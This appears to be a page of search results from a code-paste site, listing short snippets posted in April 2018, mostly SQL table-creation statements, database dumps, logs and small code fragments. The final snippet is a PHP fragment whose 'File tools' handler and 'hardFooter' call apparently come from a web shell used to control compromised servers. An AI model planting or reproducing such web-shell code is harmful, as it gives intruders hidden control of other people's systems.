42.7K results in 823 ms
8 years ago · Apr 06, 2018, 08:10 AM
CREATE TABLE list_relation ( parent_id INT UNSIGNED NOT NULL, child_id INT UNSIGNED
8 years ago · Apr 06, 2018, 07:46 AM
if it doesn't exist # (If the table exists but is defined differently
8 years ago · Apr 06, 2018, 07:34 AM
AS BEGIN -- Detect inserts IF EXISTS (select * from inserted) AND NOT EXISTS (select * from deleted)
8 years ago · Apr 06, 2018, 06:46 AM
TempDB -- Check if the table exists and if not then create it. IF NOT EXISTS(SELECT
8 years ago · Apr 06, 2018, 06:24 AM
as big as Khabib if not bigger [18:27:22] <-- laine (laine@75.102.39.16)
8 years ago · Apr 06, 2018, 06:20 AM
INTO tasters SET id=LAST_INSERT_ID()"); CREATE TABLE IF NOT EXISTS `users` ( `id` int(11) NOT
8 years ago · Apr 06, 2018, 06:16 AM
brcmf_add_if: ERROR: netdev:wlan0 already exists [ 12.285399] brcmfmac: brcmf_add_if: ignore IF event [ 12.289720] IPv6: ADDRCONF(NETDEV_UP):
8 years ago · Apr 06, 2018, 05:44 AM
SET utf8 */; USE `exileEscape`; CREATE TABLE IF NOT EXISTS `account` ( `uid` varchar(32) NOT
8 years ago · Apr 06, 2018, 05:00 AM
0.0.0.0/0 -> (null) dummy0 to table 1002: File exists 07-20 08:15:34.550 986 986
8 years ago · Apr 06, 2018, 04:06 AM
0,0 +1,30 @@ +DROP TABLE IF EXISTS `players_reports_status`; + +CREATE TABLE `players_reports_status` ( + `guid` int(10) unsigned NOT NULL DEFAULT '0', + `creation_time`
8 years ago · Apr 06, 2018, 03:56 AM
TABLE IF EXISTS `mydb`.`serie` ; CREATE TABLE IF NOT EXISTS `mydb`.`serie` ( `idserie` INT NOT
8 years ago · Apr 06, 2018, 02:54 AM
SQL_NOTES=0 */; -- -- Current Database: `quete2sql` -- CREATE DATABASE /*!32312 IF NOT EXISTS*/ `quete2sql` /*!40100 DEFAULT CHARACTER
8 years ago · Apr 06, 2018, 02:38 AM
http_host. Variants: '', 'path/to/subfolder' // Will not working if $root_path will be outside
8 years ago · Apr 06, 2018, 01:48 AM
PRIMARY KEY({})'.format(', '.join(primary_columns)) sql_query = "CREATE TABLE IF NOT EXISTS {table_name} ({columns});" sql_query = sql_query.format(table_name=table,
8 years ago · Apr 06, 2018, 01:24 AM
return new end end if not Character:WaitForChild("Body Colors", 5) then
8 years ago · Apr 06, 2018, 12:38 AM
Statement s = Skywars.getData().createStatement(); s.executeUpdate( "CREATE TABLE IF NOT EXISTS `player_data` (`uuid` VARCHAR(36), `name`
8 years ago · Apr 06, 2018, 12:10 AM
sys.exit(1) full_msg = '' prev_schema_file = TMP_DIR+'/'+DB+'_schema' if not check_file(prev_schema_file): msg = prev_schema_file+' not exists, create it and exit.' print(msg)
8 years ago · Apr 05, 2018, 11:52 PM
SQL_NOTES=0 */; -- -- Current Database: `ludwig_v_wcs_bordeaux` -- CREATE DATABASE /*!32312 IF NOT EXISTS*/ `ludwig_v_wcs_bordeaux` /*!40100 DEFAULT CHARACTER
8 years ago · Apr 05, 2018, 10:48 PM
statement changed 0 rows: CREATE TABLE IF NOT EXISTS `items` (`id` INTEGER PRIMARY
8 years ago · Apr 05, 2018, 08:24 PM
echo '<h1>File tools</h1><div class=content>'; if( !file_exists(@$_POST['p1']) ) { echo 'File not exists'; hardFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST['p1']));
Total pages: 2134